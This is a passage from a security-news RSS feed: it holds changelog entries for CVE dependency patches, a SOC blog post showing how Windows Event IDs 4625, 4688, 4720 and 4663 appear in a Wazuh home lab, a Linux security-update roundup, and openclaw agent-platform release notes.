<li><strong>security:</strong> patch rollup path traversal CVE (&gt;= 4.0.0, &lt; 4.59.0) (<a href="https://github.com/langwatch/scenario/commit/55a02598ad8d245dfac159357b17c8d89192b824">55a0259</a>)</li>
<li><strong>security:</strong> patch trim-newlines uncontrolled resource consumption (<a href="https://github.com/langwatch/scenario/issues/415" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/415/hovercard">#415</a>) (<a href="https://github.com/langwatch/scenario/commit/1c507c35364a229ba72b80b380a6f5fac46431b7">1c507c3</a>)</li>
<li><strong>security:</strong> patch vite server.fs.deny bypass and WebSocket file read CVEs (<a href="https://github.com/langwatch/scenario/issues/419" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/419/hovercard">#419</a>) (<a href="https://github.com/langwatch/scenario/commit/7bb7af95445a4b80a1daf6a4bfa9866099c2fc50">7bb7af9</a>)</li>
<li><strong>security:</strong> upgrade picomatch, @hono/node-server, and glob to fix CVEs (<a href="https://github.com/langwatch/scenario/issues/394" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/394/hovercard">#394</a>) (<a href="https://github.com/langwatch/scenario/commit/4395e52f765895a8c58def12086cb09e179e8a18">4395e52</a>)</li>
</ul>
<h3>Miscellaneous</h3>
<ul>
<li><strong>deps:</strong> bump @ungap/structured-clone past 1.3.1 (CWE-502) (<a href="https://github.com/langwatch/scenario/issues/544" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/544/hovercard">#544</a>) (<a href="https://github.com/langwatch/scenario/commit/f716e46b7f7f62ab61f5f99a761ea566985e891f">f716e46</a>)</li>
<li><strong>deps:</strong> bump pnpm/action-setup from 2.4.1 to 5.0.0 (<a href="https://github.com/langwatch/scenario/issues/300" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/300/hovercard">#300</a>) (<a href="https://github.com/langwatch/scenario/commit/053cc3a7cb192f725fe2c64beddeb996493c122d">053cc3a</a>)</li>
<li><strong>deps:</strong> remove unused nanoid-cli devDep from vitest examples (<a href="https://github.com/langwatch/scenario/issues/422" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/422/hovercard">#422</a>) (<a href="https://github.com/langwatch/scenario/commit/d4a40a5871239ee5440bb007cb5a32e9eab5df0e">d4a40a5</a>)</li>
<li>main-side cleanup — docs + spec + python/TS parity (<a href="https://github.com/langwatch/scenario/issues/586" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/586/hovercard">#586</a>) (<a href="https://github.com/langwatch/scenario/commit/371f94cd20998004398fa19d663254cb9aace8d8">371f94c</a>)</li>
<li><strong>tests:</strong> remove flaky 10-turn travel-planning example test (<a href="https://github.com/langwatch/scenario/issues/423" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/423/hovercard">#423</a>) (<a href="https://github.com/langwatch/scenario/commit/bbe86de991124e9cfe64d103c107795f9ff0ae3c">bbe86de</a>)</li>
<li><strong>tests:</strong> remove flaky live-LLM travel-agent example test (<a href="https://github.com/langwatch/scenario/commit/ac911ff2da99de1ae0f8341e6702cb96c448db54">ac911ff</a>)</li>
<li><strong>tests:</strong> remove flaky travel-agent example test (<a href="https://github.com/langwatch/scenario/issues/425" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/425/hovercard">#425</a>) (<a href="https://github.com/langwatch/scenario/commit/ac911ff2da99de1ae0f8341e6702cb96c448db54">ac911ff</a>)</li>
<li><strong>tests:</strong> remove no-op example tests + audit notes (<a href="https://github.com/langwatch/scenario/issues/424" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/424/hovercard">#424</a>) (<a href="https://github.com/langwatch/scenario/commit/947f219344e9beb6267f8a6d43e9b01717284da2">947f219</a>)</li>
<li><strong>tests:</strong> remove no-op example tests that always pass or are skipped (<a href="https://github.com/langwatch/scenario/commit/947f219344e9beb6267f8a6d43e9b01717284da2">947f219</a>)</li>
</ul>
<h3>Code Refactoring</h3>
<ul>
<li><strong>test/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496905027" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/522" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/522/hovercard" href="https://github.com/langwatch/scenario/issues/522">#522</a>:</strong> move instanceof assertions from Given to Then in voice contract surface (<a href="https://github.com/langwatch/scenario/issues/559" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/559/hovercard">#559</a>) (<a href="https://github.com/langwatch/scenario/commit/c8cca4ecafb0ebfb10d2d39b36ac2fe28443a376">c8cca4e</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Windows Event IDs Every SOC Analyst Should Know (With Real Lab Evidence)]]></title>
<description><![CDATA[These aren’t just numbers from a study guide — they’re the fingerprints attackers leave behind. Here’s what each one looks like inside a real SIEM.By Ronak Mishra · Security+ Certified · Wazuh Home LabMost cybersecurity courses hand you a list of Windows Event IDs and tell you to memorize them. W...]]></description>
<link>https://tsecurity.de/de/3571869/hacking/5-windows-event-ids-every-soc-analyst-should-know-with-real-lab-evidence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571869/hacking/5-windows-event-ids-every-soc-analyst-should-know-with-real-lab-evidence/</guid>
<pubDate>Thu, 04 Jun 2026 10:21:44 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>These aren’t just numbers from a study guide — they’re the fingerprints attackers leave behind. Here’s what each one looks like inside a real SIEM.</h4><p>By Ronak Mishra · Security+ Certified · Wazuh Home Lab</p><p>Most cybersecurity courses hand you a list of Windows Event IDs and tell you to memorize them. What they don’t show you is what these events actually look like when they fire — the raw fields, the timestamps, the account names, the parent processes.</p><p>I set up a home lab running Wazuh SIEM connected to a Windows 11 agent and deliberately triggered each of these events to see exactly what gets captured. Every screenshot in this post is from that lab. No stock images, no theory — just real detections.</p><p>Here are the 5 event IDs that matter most when something bad is happening on a Windows machine.</p><p><strong>Event ID 4625 Failed logon attempt</strong></p><blockquote>“An attacker is outside your network trying passwords one by one, hoping something works. This is what it looks like inside your SIEM before they get in.”</blockquote><p>Event ID 4625 fires every time a Windows logon attempt fails. One or two of these is completely normal — people mistype passwords. But when you see a cluster of them hitting in rapid succession targeting the same account, that’s a brute force attack in progress.</p><p>The fields that matter most: targetUserName (who they’re targeting), subStatus (why it failed), and logonType (how they’re trying to get in). SubStatus code 0xc0000064 means the targeted user doesn’t even exist — a classic sign of username enumeration before a brute force.</p><p>I simulated this by running repeated failed logon attempts against a non-existent account called “fakeuser” on my Windows 11 VM. Here’s what Wazuh captured:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uO_J5UloBalrsiFH6Zbq2A.png"><figcaption>12 failed logon attempts against a non-existent user, captured in Wazuh in under 2 minutes. The spike on the right shows the exact moment the attempts were made.</figcaption></figure><p>Expanding one of those alerts reveals exactly what happened at the field level — the targeted account name, the failure reason code, and the plain-English confirmation from Windows itself:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uqbu6PO1boxwZ6si5R3xdg.png"><figcaption>subStatus 0xc0000064 confirms the targeted account doesn’t exist. The event ID 4625 is highlighted in yellow by Wazuh — and Windows confirms it in plain English at the bottom.</figcaption></figure><p><strong>Event ID 4688 New process created</strong></p><blockquote>“Malware can’t do anything without running a process. This event fires the moment something executes — including the tools attackers use to steal credentials or move through a network.”</blockquote><p>Every time a new process starts on Windows, Event ID 4688 fires — if process creation auditing is enabled. The key isn’t just what process ran, it’s what spawned it. The parent-child relationship tells the real story.</p><p>A legitimate user opening Notepad looks completely different from malware spawning PowerShell from inside a Word document. In an attack scenario, watch for: PowerShell or cmd spawned by Office applications, encoded command line arguments, or executables running from temp folders.</p><p>I triggered this by launching cmd, PowerShell, and Notepad from my Windows VM. Wazuh captured 345 process creation events — the spike you see in the chart is the exact moment those commands ran:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*X_mI5GD9gfhVcW0TAgojqg.png"><figcaption>345 process creation events captured — the spike at 20:29 is when the test commands executed. Row 1 shows Notepad being spawned by Notepad itself, row 2 shows PowerShell as the parent process.</figcaption></figure><p>The expanded view shows the full execution chain in one log entry — exactly what process ran, what launched it, and who triggered it:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5zPKT7oOwM-0W74fY-phvA.png"><figcaption>newProcessName shows what ran. parentProcessName shows PowerShell launched it. In a real attack this parent-child chain is where you catch malicious execution.</figcaption></figure><p><strong>Event ID 4720 User account created</strong></p><blockquote>“The attacker is already inside. Now they’re creating a backdoor account so they can return even if their original access gets cut off.”</blockquote><p>Event ID 4720 fires whenever a new local or domain user account is created. In a normal environment this should be rare and expected — IT provisioning a new employee, for example. If you see this event at 2am, created by a non-admin process, with no change ticket backing it up, that’s a persistence mechanism being installed.</p><p>This maps directly to MITRE ATT&amp;CK T1136 — Create Account. It’s one of the most reliable persistence indicators in Windows environments because attackers almost always need a fallback entry point.</p><p>I created a test account called “testattacker” using PowerShell to simulate this. Wazuh caught it immediately — a single isolated event with zero noise around it:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fA0xpczARnXj6ZfJ3PuWVg.png"><figcaption>1 hit. That’s it. One account creation event isolated at 20:37 — both samAccountName and targetUserName confirm the backdoor account name: testattacker.</figcaption></figure><p>The expanded view shows every detail Wazuh captured — the account name, who created it, and the event ID confirmed in yellow:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Wab9Fvo5SnaYgH6-3TZJ1Q.png"><figcaption>samAccountName and targetUserName both show testattacker. subjectUserName shows ronakmishra — the account that created it. Event ID 4720 highlighted in yellow by Wazuh.</figcaption></figure><p><strong>Event ID 4663 File or object accessed</strong></p><blockquote>“Ransomware touches hundreds of files in seconds. A credential-stealing tool targets one specific file. Either way — this event is watching.”</blockquote><p>Event ID 4663 logs access attempts to specific files and folders when auditing is enabled. In Wazuh, the File Integrity Monitoring module captures this same behavior in real time — logging every file that gets created, modified, or deleted in monitored directories, including SHA1 and MD5 hashes before and after so you can prove exactly what changed.</p><p>Ransomware behavior looks like hundreds of these events firing in rapid sequence across multiple directories. A targeted attack looks like one precise access to a credential store or sensitive config file. Volume and pattern are everything.</p><p>My Wazuh FIM is running in realtime mode on monitored directories. I created a file called “you are hacked.txt” to trigger it deliberately. Here’s what got captured the moment that file was created:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ohvTMhz7_0TvchgmdYkYXA.png"><figcaption>Wazuh FIM detected the file in real time — path, user, SHA1 hash, and permissions all captured the moment it appeared. The filename makes the scenario obvious.</figcaption></figure><p><strong>How to think about these as a SOC analyst</strong></p><p>Knowing what each event ID means in isolation is only half the skill. The real work is correlation — one event rarely tells the full story. Here’s how these connect in real attack scenarios:</p><ul><li>Multiple 4625s from one source followed by a 4624 right after — brute force that succeeded</li><li>4688 showing PowerShell spawned by an Office application — likely a phishing payload executing</li><li>4720 outside business hours with no change ticket — unauthorized persistence attempt</li><li>Hundreds of 4663s firing across many files in under 30 seconds — ransomware encryption in progress</li></ul><p>That pattern — two or more signals, a time window, a threshold — is the foundation of detection engineering. It’s what separates someone who reads logs from someone who builds detection rules. And it’s exactly the thinking SOC roles are looking for in interviews.</p><blockquote><strong>I’m building out more detection scenarios in my home lab and documenting everything as I go — Wazuh, Splunk, MITRE ATT&amp;CK mapping, and more. If you’re on the same path — studying for CySA+, building your first SIEM lab, or working toward your first SOC role — feel free to connect on LinkedIn. Always good to compare notes with people actually doing the work.</strong></blockquote><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9bf8d1f88bca" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/5-windows-event-ids-every-soc-analyst-should-know-with-real-lab-evidence-9bf8d1f88bca">5 Windows Event IDs Every SOC Analyst Should Know (With Real Lab Evidence)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (php-twig), Fedora (hplip, python-wsgidav, roundcubemail, and xorg-x11-server), Oracle (compat-openssl10, httpd:2.4, and kernel), Red Hat (osbuild-composer), SUSE (busybox, cloudflared, cockpit, cups, ffmpeg-4, gnutls, google-osconfig-agent, helm, hplip...]]></description>
<link>https://tsecurity.de/de/3569654/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569654/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 03 Jun 2026 15:06:48 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (php-twig), <b>Fedora</b> (hplip, python-wsgidav, roundcubemail, and xorg-x11-server), <b>Oracle</b> (compat-openssl10, httpd:2.4, and kernel), <b>Red Hat</b> (osbuild-composer), <b>SUSE</b> (busybox, cloudflared, cockpit, cups, ffmpeg-4, gnutls, google-osconfig-agent, helm, hplip, kernel, kubelogin, libjxl, libsoup, libunbound8, LibVNCServer-devel, mapserver, nvidia-open-driver-G06-signed, nvidia-open-driver-G07-signed, openssh, python-idna, qemu, rqlite, shadowsocks-v2ray-plugin, ucode-intel, unbound, vim, vorbis-tools, and xorg-x11-server), and <b>Ubuntu</b> (age, dovecot, editorconfig-core, gobgp, libapache-mod-jk, libcommons-lang-java, libcommons-lang3-java, libeconf, linux, linux-aws, linux-aws-6.8, linux-aws-fips, linux-azure, linux-fips,
 linux-gcp, linux-gcp-6.8, linux-gcp-fips, linux-gke, linux-gkeop,
 linux-hwe-6.8, linux-ibm, linux-ibm-6.8, linux-nvidia, linux-nvidia-6.8,
 linux-nvidia-lowlatency, linux-nvidia-tegra, linux-oracle,
 linux-oracle-6.8, linux-raspi, linux-raspi-realtime, linux-realtime,
 linux-realtime-6.8, linux, linux-aws, linux-azure, linux-azure-6.17, linux-hwe-6.17,
 linux-nvidia-6.17, linux-oem-6.17, linux-oracle, linux-oracle-6.17,
 linux-raspi, linux-realtime, linux-realtime-6.17, linux, linux-aws, linux-gcp, linux-ibm, linux-nvidia, linux-oracle,
 linux-raspi, linux-realtime, linux-aws-6.17, linux-gcp, linux-gcp-6.17, luanti, mysql-8.0, mysql-8.4, node-tar-fs, and unbound).]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.6.1-beta.2]]></title>
<description><![CDATA[2026.6.1
Highlights

Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (#88129, #88136, #88141, #88162, #88182)
Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Sl...]]></description>
<link>https://tsecurity.de/de/3564438/downloads/openclaw-202661-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3564438/downloads/openclaw-202661-beta2/</guid>
<pubDate>Tue, 02 Jun 2026 00:01:21 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.6.1</h2>
<h3>Highlights</h3>
<ul>
<li>Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Slack, Discord, Microsoft Teams, Google Chat, Google Meet, and iOS realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Provider and plugin requests now bound more timers, retries, OAuth/device-code lifetimes, media downloads, local service probes, and generated-content polling paths before they can hang a run.</li>
<li>Skills, session metadata, gateway runtime state, plugin metadata, memory watchers, and store writes do less repeated work on hot paths while keeping config, dispatch, and Linux file-watch behavior stable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565501615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89185" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89185/hovercard" href="https://github.com/openclaw/openclaw/pull/89185">#89185</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565570172" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89188" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89188/hovercard" href="https://github.com/openclaw/openclaw/pull/89188">#89188</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502554299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85351" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85351/hovercard" href="https://github.com/openclaw/openclaw/pull/85351">#85351</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Skills and plugin loading now handle stale disabled snapshots and loader failures more clearly, so channel turns avoid disabled SecretRefs and operators get better recovery guidance. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4401582392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79072/hovercard" href="https://github.com/openclaw/openclaw/issues/79072">#79072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4403061400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79173/hovercard" href="https://github.com/openclaw/openclaw/pull/79173">#79173</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeus1959/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeus1959">@zeus1959</a>.</li>
<li>Workboard, SecretRef plugin manifests, hosted iOS push relay, and external Copilot/Tokenjuice packaging add broader orchestration, integration, and plugin delivery surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544177368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87796" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87796/hovercard" href="https://github.com/openclaw/openclaw/pull/87796">#87796</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550878888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88107" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88107/hovercard" href="https://github.com/openclaw/openclaw/pull/88107">#88107</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Skill Workshop now has a fuller Control UI flow with proposal lists, today actions, revision handoff, searchable file previews, review states, locale coverage, and reusable session routing.</li>
<li>Chat and Control UI startup paths keep sends alive through history loading, stream deltas incrementally, skip markdown work while streaming, keep drafts local while typing, clear the composer after sends, trace first-output latency, prioritize first connect, and expose calmer composer controls. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558851324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88772/hovercard" href="https://github.com/openclaw/openclaw/pull/88772">#88772</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559381540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88825" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88825/hovercard" href="https://github.com/openclaw/openclaw/pull/88825">#88825</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561424737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88998" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88998/hovercard" href="https://github.com/openclaw/openclaw/pull/88998">#88998</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561967219" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89030" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89030/hovercard" href="https://github.com/openclaw/openclaw/pull/89030">#89030</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4563810098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89106" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89106/hovercard" href="https://github.com/openclaw/openclaw/pull/89106">#89106</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>Provider coverage and model metadata now include MiniMax M3, account OAuth endpoints, Google/Vertex catalog fixes, OpenRouter SQLite model caching, Copilot Claude 1M capabilities, Foundry reasoning alignment, and OpenAI response replay guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556082619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/88480/hovercard" href="https://github.com/openclaw/openclaw/issues/88480">#88480</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556466505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88512" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88512/hovercard" href="https://github.com/openclaw/openclaw/pull/88512">#88512</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559632397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88851" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88851/hovercard" href="https://github.com/openclaw/openclaw/pull/88851">#88851</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559735267" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88860" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88860/hovercard" href="https://github.com/openclaw/openclaw/pull/88860">#88860</a>)</li>
<li>iMessage monitor state, inbound queues, and plugin install ledgers moved toward SQLite-backed state so restarts and local monitors recover with less duplicate filesystem scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559074657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88794/hovercard" href="https://github.com/openclaw/openclaw/pull/88794">#88794</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559113281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88797" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88797/hovercard" href="https://github.com/openclaw/openclaw/pull/88797">#88797</a>)</li>
<li>Release, CI, Docker, E2E, plugin install, and diagnostics lanes now cap more logs, response bodies, readiness probes, artifact checks, status polling, child workflow waits, docker package cleanup, and rollback snapshots so failures report bounded proof instead of stalling.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Docs: add a dedicated Skill Workshop guide covering governed skill creation, reviewable proposals, CLI, Gateway, agent tool behavior, approval policy, support files, and recovery, and refresh the ClawHub showcase cards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558517307" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88734" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88734/hovercard" href="https://github.com/openclaw/openclaw/pull/88734">#88734</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Skills: let the <code>skill_workshop</code> agent tool apply, reject, and quarantine explicit proposals through the guarded review flow. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let proposals carry approved support files under standard skill folders, with scanner, hash, and rollback safeguards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let pending proposals be revised in place with versioned, dated proposal frontmatter before approval. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: add Skill Workshop with pending proposals, CLI/Gateway review actions, rollback metadata, and the <code>skill_workshop</code> agent tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skill Workshop: add the Control UI navigation, styled dashboard, proposal today view, revision dialog, file preview modal, searchable preview files, reusable session handoff, and localized strings.</li>
<li>Plugins: externalize Tokenjuice as the official <code>@openclaw/tokenjuice</code> plugin with npm and ClawHub publish metadata.</li>
<li>Plugins: externalize the GitHub Copilot agent runtime as the official <code>@openclaw/copilot</code> plugin with npm and ClawHub publish metadata.</li>
